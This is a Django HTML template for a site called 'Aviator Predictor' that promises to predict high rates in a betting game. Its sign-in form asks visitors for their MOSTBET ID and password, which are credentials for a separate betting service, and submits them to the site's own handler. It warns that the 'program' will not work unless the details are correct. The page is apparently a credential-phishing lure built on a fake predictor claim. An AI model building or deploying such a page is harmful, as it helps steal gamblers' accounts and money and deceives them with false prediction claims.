{%load static%}
{%load i18n%}
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Aviator Predictor</title>
    <link rel="stylesheet" href="{% static 'style.css'%}" />
  </head>
  <body>
    <main>
      <div class="box">
        <div class="inner-box">
          <div class="forms-wrap">
            <form action="" method="POST" autocomplete="off" class="sign-in-form">
             
              {% csrf_token %}
              <div class="logo">
                <img src="{% static 'img/aviator.png' %}" alt="Predictor" />
                <h4>AviaPredictor</h4>
              </div>

              <div class="heading">
                <h2>Aviator Predictor</h2>
                <h6> {% trans "Enter your MOSTBET ID and PASSWORD" %}</h6>
              </div>

              <div class="actual-form">
                <div class="input-wrap">
                  {{form.number}}
                  {% comment %} <input
                    type="text"
                    minlength="4"
                    class="input-field"
                    autocomplete="off"
                    required
                  /> {% endcomment %}
                  <label>ID / email</label>
                </div>

                <div class="input-wrap">
                  {{form.password}}
                  {% comment %} <input
                    type="password"
                    minlength="4"
                    class="input-field"
                    autocomplete="off"
                    required
                  /> {% endcomment %}
                  <label> {% trans "Password" %}</label>
                </div>

                <input type="submit" value="Sign In" class="sign-btn" />
                {% comment %} <div class="text-center pd">
                  <button type="submit" class="btn btn-light btn-radius btn-brd grd1 btn-block">Get a Quote</button>
              </div> {% endcomment %}
                <p class="text"> {% trans "WARNING !!! If you do not enter your user id and password correctly, the program will not work." %}
                </p>
              </div>
            </form>
          </div>

          <div class="carousel">
            <div class="images-wrapper">
              <img src="{% static 'img/1111.jpg'%}" class="image img-1 show" alt="" />
              <img src="{% static 'img/2222.jpg'%}" class="image img-2" alt="" />
              <img src="{% static 'img/3333.jpg'%}" class="image img-3" alt="" />
            </div>

            <div class="text-slider">
              <div class="text-wrap">
                <div class="text-group">
                  <h2> {% trans "The BEST Predictor" %}</h2>
                  <h2>{% trans "Know the high rates." %}</h2>
                  <h2> {% trans "The easiest to use." %}</h2>
                </div>
              </div>

              <div class="bullets">
                <span class="active" data-value="1"></span>
                <span data-value="2"></span>
                <span data-value="3"></span>
              </div>
            </div>
          </div>
        </div>
      </div>
    </main>

    <!-- Javascript file -->

    <div class="lang">
        <form action="{% url 'set_language' %}" class="lang" method="post">{% csrf_token %}
            <input name="next" type="hidden"  value="{{ redirect_to }}">
            <select name="language" class="languages">
                {% get_current_language as LANGUAGE_CODE %}
                {% get_available_languages as LANGUAGES %}
                {% get_language_info_list for LANGUAGES as languages %}
                {% for language in languages %}
                    <option value="{{ language.code }}"{% if language.code == LANGUAGE_CODE %} selected{% endif %}>
                        {{ language.name_local }} ({{ language.code }})
                    </option>
                {% endfor %}
            </select>
            <input type="submit" value="Go" >
        </form>
    </div>

    <script src="{% static 'app.js'%}"></script>
  </body>
</html>
